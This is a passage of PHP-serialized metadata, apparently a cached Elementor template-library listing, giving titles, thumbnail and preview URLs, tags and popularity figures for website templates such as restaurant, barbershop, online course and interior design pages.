Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:735;s:11:\"trend_index\";i:829;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:470;a:16:{s:4:\"tmpl\";i:474;s:2:\"id\";i:5198;s:5:\"title\";s:6:\"CTA 30\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_1.png\";s:12:\"tmpl_created\";i:1520443458;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-30/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:572;s:11:\"trend_index\";i:511;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:471;a:16:{s:4:\"tmpl\";i:1005;s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:389;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:472;a:16:{s:4:\"tmpl\";i:475;s:2:\"id\";i:5206;s:5:\"title\";s:6:\"CTA 31\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_2.png\";s:12:\"tmpl_created\";i:1520443459;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-31/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:593;s:11:\"trend_index\";i:611;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:473;a:16:{s:4:\"tmpl\";i:1009;s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:551;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:474;a:16:{s:4:\"tmpl\";i:480;s:2:\"id\";i:5249;s:5:\"title\";s:6:\"CTA 32\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_4.png\";s:12:\"tmpl_created\";i:1520443470;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-32/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:512;s:11:\"trend_index\";i:409;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:475;a:16:{s:4:\"tmpl\";i:1008;s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:723;s:11:\"trend_index\";i:711;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:476;a:16:{s:4:\"tmpl\";i:612;s:2:\"id\";i:5550;s:5:\"title\";s:6:\"CTA 33\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_1.png\";s:12:\"tmpl_created\";i:1520520682;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-33/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:260;s:11:\"trend_index\";i:562;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:477;a:16:{s:4:\"tmpl\";i:1016;s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant &#8211; Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:727;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:478;a:16:{s:4:\"tmpl\";i:536;s:2:\"id\";i:5852;s:5:\"title\";s:6:\"CTA 34\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2018/03/form_1.png\";s:12:\"tmpl_created\";i:1520443600;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-34/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:563;s:11:\"trend_index\";i:828;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:479;a:16:{s:4:\"tmpl\";i:999;s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/barbershop-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:832;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:480;a:16:{s:4:\"tmpl\";i:624;s:2:\"id\";i:5675;s:5:\"title\";s:5:\"CTA 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_8.png\";s:12:\"tmpl_created\";i:1520520707;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:391;s:11:\"trend_index\";i:484;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:481;a:16:{s:4:\"tmpl\";i:1000;s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/barbershop-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:744;s:11:\"trend_index\";i:739;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:482;a:16:{s:4:\"tmpl\";i:616;s:2:\"id\";i:5591;s:5:\"title\";s:5:\"CTA 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_4.png\";s:12:\"tmpl_created\";i:1520520691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:133;s:11:\"trend_index\";i:130;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:483;a:16:{s:4:\"tmpl\";i:1001;s:2:\"id\";i:13548;s:5:\"title\";s:27:\"Barbershop &#8211; Services\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/05/Services-Page.jpg\";s:12:\"tmpl_created\";i:1589893298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/barbershop-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:761;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:484;a:16:{s:4:\"tmpl\";i:617;s:2:\"id\";i:5599;s:5:\"title\";s:5:\"CTA 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_4.png\";s:12:\"tmpl_created\";i:1520520693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:252;s:11:\"trend_index\";i:362;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:485;a:16:{s:4:\"tmpl\";i:1002;s:2:\"id\";i:13560;s:5:\"title\";s:26:\"Barbershop &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1589893307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:756;s:11:\"trend_index\";i:822;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:486;a:16:{s:4:\"tmpl\";i:514;s:2:\"id\";i:5575;s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";i:1520443543;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:13;s:11:\"trend_index\";i:586;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:487;a:16:{s:4:\"tmpl\";i:1003;s:2:\"id\";i:13587;s:5:\"title\";s:26:\"Barbershop &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/05/Contact-Us-Page.jpg\";s:12:\"tmpl_created\";i:1589893315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:753;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:488;a:16:{s:4:\"tmpl\";i:622;s:2:\"id\";i:5658;s:5:\"title\";s:5:\"CTA 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_7.png\";s:12:\"tmpl_created\";i:1520520704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:187;s:11:\"trend_index\";i:235;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:489;a:16:{s:4:\"tmpl\";i:982;s:2:\"id\";i:13307;s:5:\"title\";s:26:\"Online Course &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.jpg\";s:12:\"tmpl_created\";i:1587474541;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/online-course-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:125;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:490;a:16:{s:4:\"tmpl\";i:621;s:2:\"id\";i:5650;s:5:\"title\";s:5:\"CTA 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_7.png\";s:12:\"tmpl_created\";i:1520520702;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:94;s:11:\"trend_index\";i:148;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:491;a:16:{s:4:\"tmpl\";i:983;s:2:\"id\";i:13328;s:5:\"title\";s:27:\"Online Course &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.jpg\";s:12:\"tmpl_created\";i:1587474558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/online-course-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:508;s:11:\"trend_index\";i:429;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:492;a:16:{s:4:\"tmpl\";i:1061;s:2:\"id\";i:15407;s:5:\"title\";s:24:\"Dance Studio &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/10/404.jpg\";s:12:\"tmpl_created\";i:1603181958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/dance-studio-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:22:\"[\"404\",\"Dance Studio\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:783;s:11:\"trend_index\";i:710;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:493;a:16:{s:4:\"tmpl\";i:984;s:2:\"id\";i:13338;s:5:\"title\";s:33:\"Online Course &#8211; Course Page\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Course-Page.png\";s:12:\"tmpl_created\";i:1587474574;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/online-course-course-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:337;s:11:\"trend_index\";i:310;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:494;a:16:{s:4:\"tmpl\";i:1062;s:2:\"id\";i:15400;s:5:\"title\";s:27:\"Dance Studio &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Footer.jpg\";s:12:\"tmpl_created\";i:1603181989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/dance-studio-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:25:\"[\"Dance Studio\",\"Footer\"]\";s:10:\"menu_order\";i:114;s:16:\"popularity_index\";i:586;s:11:\"trend_index\";i:243;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:495;a:16:{s:4:\"tmpl\";i:985;s:2:\"id\";i:13352;s:5:\"title\";s:29:\"Online Course &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1587474591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/online-course-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:114;s:16:\"popularity_index\";i:565;s:11:\"trend_index\";i:533;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:496;a:16:{s:4:\"tmpl\";i:1063;s:2:\"id\";i:15391;s:5:\"title\";s:27:\"Dance Studio &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Header.jpg\";s:12:\"tmpl_created\";i:1603182011;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/dance-studio-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:25:\"[\"Dance Studio\",\"Header\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:352;s:11:\"trend_index\";i:67;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:497;a:16:{s:4:\"tmpl\";i:971;s:2:\"id\";i:13187;s:5:\"title\";s:33:\"Interior Design &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.png\";s:12:\"tmpl_created\";i:1586148661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/interior-design-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:331;s:11:\"trend_index\";i:264;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:498;a:16:{s:4:\"tmpl\";i:874;s:2:\"id\";i:11192;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/07/Footer_small.jpg\";s:12:\"tmpl_created\";i:1564642399;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Digital Agency\",\"Footer\",\"Marketing\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:172;s:11:\"trend_index\";i:105;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:499;a:16:{s:4:\"tmpl\";i:1453;s:2:\"id\";i:16346;s:5:\"title\";s:33:\"Your New Home &#8211; Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";i:1660205402;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/your-new-home-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:31:\"[\"Landing Pages\",\"Real estate\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:500;a:16:{s:4:\"tmpl\";i:972;s:2:\"id\";i:13199;s:5:\"title\";s:29:\"Interior Design &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.png\";s:12:\"tmpl_created\";i:1586148666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/interior-design-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:316;s:11:\"trend_index\";i:334;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:501;a:16:{s:4:\"tmpl\";i:873;s:2:\"id\";i:11198;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-digital-marketing-agency.png\";s:12:\"tmpl_created\";i:1564642395;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Digital Agency\",\"Header\",\"Marketing\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:34;s:11:\"trend_index\";i:10;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:502;a:16:{s:4:\"tmpl\";i:973;s:2:\"id\";i:13214;s:5:\"title\";s:32:\"Interior Design &#8211; Projects\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/portfolio_s.jpg\";s:12:\"tmpl_created\";i:1586148672;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/interior-design-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:367;s:11:\"trend_index\";i:323;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:503;a:16:{s:4:\"tmpl\";i:872;s:2:\"id\";i:11204;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/07/404_small.jpg\";s:12:\"tmpl_created\";i:1564642389;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:36:\"[\"404\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:301;s:11:\"trend_index\";i:239;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:504;a:16:{s:4:\"tmpl\";i:974;s:2:\"id\";i:13229;s:5:\"title\";s:31:\"Interior Design &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.png\";s:12:\"tmpl_created\";i:1586148677;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/interior-design-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:395;s:11:\"trend_index\";i:337;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:505;a:16:{s:4:\"tmpl\";i:871;s:2:\"id\";i:11220;s:5:\"title\";s:14:\"Digital 